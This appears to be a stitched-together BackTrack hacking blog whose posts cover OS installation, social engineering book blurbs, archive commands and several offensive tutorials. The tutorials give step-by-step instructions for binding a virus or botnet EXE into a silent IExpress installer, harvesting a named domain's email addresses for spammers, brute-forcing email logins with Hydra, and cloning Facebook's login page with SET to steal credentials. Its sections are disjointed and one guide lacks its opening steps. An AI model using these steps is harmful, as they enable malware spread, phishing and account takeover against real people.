This method of installation is the simplest way. I have made it in the assumption that you have a Windows installation that is taking up all the space on your disk drive and you would like to resize and repartition the disk drive in order to allow a BackTrack install alongside your Windows.
DONT FORGET TO BACK-UP YOUR WINDOWS INSTALLATION FIRST!
Burn it to a DVD or a flash drive, then place the DVD in your computer’s and reboot. The system will boot into a console and you will see a prompt choose 1st option. To boot into a Live KDE desktop, type startx and press the Enter key on your keyboard.
1. Once in the Live desktop, click on the Install BackTrack icon on the desktop.
Kevin Mitnick was one of the most famous social engineers in the world—popularized the term “social engineering.”
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.
“Albert Einstein once said, “Information is not knowledge.” That is a powerful thought. Just reading this book will not somehow implant this knowledge into your being. Apply the principles, practice what is taught in these pages, and make the information a part of your daily life. When you do that is when you will see this knowledge take effect.”
Christopher Hadnagy
The first book to reveal and dissect the technical aspect of many social engineering maneuvers:Download here.
The new LPI Linux Essentials exam was launched at LinuxTag this week and Linup Front released their e-book on Linux Essentials at the same time under a creative commons license.
The Linux Essentials defines the basic knowledge required to competently use a desktop or mobile device using a Linux Operating System.
The Linux Essentials certificate is slated to define the basic knowledge necessary to use a Linux computer productively, and through a corresponding education programme aid young people and adults new to the open source community in understanding Linux and open-source software in the context of the ITC industry.
Linux Essentials is a new certification by the Linux Professional Institute (LPI).
Commands, compressing files, networking, programming language and much more.Download here.
3. Make sure the check box is on “Create new Self Extraction Directive file”, then hit “Next”.
4. Click on the checkbox “Extract files and run an instalation command”, then hit “Next”.
5. Then choose a name or just hit the space bar once, to make a space in the textbox, then hit “Next”.
6. Then make sure the checkbox is on “No Prompt”, then hit “Next”.
7. Then make the checkbox on “Do not display a license”, then hit “Next”.
8. Then hit “Add” on the iexpress box, and then a window should pop up, just browse your computer and find your Virus EXE, then hit “Open”.
9. Once your done with that, it should take you back to the iexpress window, then hit “Add” again. Browse your computer again but this time for your Program your wanting it to run after your botnet. Then hit “Open”.
10. Then after your done adding the botnet/virus and the program to the bind list, hit “Next”.
11. Now on the first drop down box (Install Program) put your Virus there.
12. Now select your program you want to run after the bot in the next drop down box. (Post Install Command). Then hit “Next”.
13. Now next select the checkbox “Hidden”, and hit “Next”.
14. Then select “No Message”, then hit “Next”.
15. Now select “Browse” and find where you want to save your new binded exe at, and then type a name for it and hit “Save”.
16. Now select the checkbox “Hide File Extracting Progress Animation from User”, then hit “Next”.
17. Then hit the checkbox “No restart”, and hit “Next”.
Quick tutorial on how to extract email addresses from web sites.
Unlike search engines, email harvesters are only looking for email addresses. They are usually sent by spammers and any addresses they find are added to their spam database. Obviously this is a bad thing and you don’t want harvesters to find your address.
To deal with havesters, display the address using an image file so harvesters can’t see it. Users must manually enter the address into an email, you could also protect the page containing the address with a password, ”encode” the address using JavaScript or the most commom, use a contact form.
To prevent other people to harvest your email, do not post your email at the public area (forum, website etc) and disable “display email address” on your public profile.
Let’s cut the crap and start with the tutorial:
1. Go to Metasploit console by typing msfconsole, and then run:
# msf> use gather/search_email_collector
2. Now you need to set up the domain you want to locate the email address then type “run” or “exploit” and wait for results as shown in snapshot:
# set DOMAIN globo.com
# run
As you can see harvester has found 3 emails from globo.com!
That’s it. . . now collect as many emails as you can and sell to spammers! Just kidding. . .
QR Code is the trademark for a type of matrix barcode.
With this Backtrack QR Code Generator you could either create a code redirecting to your site or aQRCode with a URL (or your IP) then create a SET attack vector to assist with the attack.
The purpose of this article is not to show how to hack email accounts, but to demonstrate the power of Hydra combined with a strong wordlist.
Hydra is a tool that makes cracking protocols such as pop3, ftp and telnet relatively easy. In my example, I will be cracking an email account (my own). Hydra uses brute force, so you HAVE to have the word in your wordlist in order to hack the email.
I’ll be hacking a pop3 email account but you can use other protocols, such as:
TELNET, FTP, FIREBIRD, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, HTTP-PROXY-NTLM, HTTP-FORM-GET, HTTP-FORM-POST, MYSQL, POSTGRES, POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, VNC, POP3, VMWARE AUTH.
1. Open Hydra typing “xhydra” or gothrough menu.
2. On the Target tab, enter the target, the port, the protocol and check the options like below:
3. On the Passwords tab, enter the username (the email account you want to hack check password strength). Check the “Password List” button (then choose the path to your password list), “try login as password” and empty password options.
A dictionary attack using a wordlist relies on the fact that most users choose weak passwords. Very common passwords include password, computer, work, and most of the popular female names. A wordlist can be used to to attempt a dictionary attack against any system which allows repetitive login attempts, such as SSH or POP3. But you already knew that. . . My word lists:
- Social Engineering:Understood to mean the art of manipulating people into performing actions or divulging confidential information.
I’m going to show you how to hack facebook account using backtrack 5. Just follow the steps.
1. Open your backtrack 5’s terminal and type cd /pentest/exploits/set (or go through start menu), then type ./set to open the Social Engineering Tool Kit SET
2. Select 1st option (1 – Social-Engineering Attacks) and hit enter. After that choose 2nd option “Website Attack Vectors” (as shown in snapshot)
3. Now just select 3rd Option “Credential Harvester Attack Method” and Hit ENTER.
4. Then select 2nd option “Site Cloner” and Hit ENTER.
5. Here you need to add the URL of Facebook (or the site you want to hack, like gmail, msn). Hit enter twice, you’ll see this message.
After adding the URL hit enter, wait set to clone the site and hit enter again.
This is a very simple, quick and easy way of compression (zipping) and decompression (extracting) files using command line.
First of all open terminal and go to the file folder.
Example:
# cd /home/user (go to the directory file was downloaded) # ls (to make sure package is there)
To combine multiple files and/or directories into a single file, use the following command:
tar -cvf your_file.tar inputfile1 inputfile2
To extract an archive created by tar:
tar -xvf your_file.tar
Extracting gz and bz2
bz2 files: tar -jxvf nome-do-arquivo.tar.bz2
gz files: tar -zxvf nome-do-arquivo.tar.gz *v is for verbose mode
To unzip files use:
unzip <file_name.zip>
To zip:
zip <new_zip_file_name> <file_to_zip>
Example: I want to zip “backtrack.txt”
# zip bacaktrack.zip backtrack.txt
For multiple files:
# zip output_file_name.zip backtrack(1).txt backtrack(2).txt backtrack(3).txt
The installation procedure for software that comes in tar.gz and tar.bz2 packages isn’t always the same, but usually it’s like this:
# tar xvzf package.tar.gz (or tar xvjf package.tar.bz2)
# cd package
# ./configure
# make
# make install
- if you got any doubts just ask
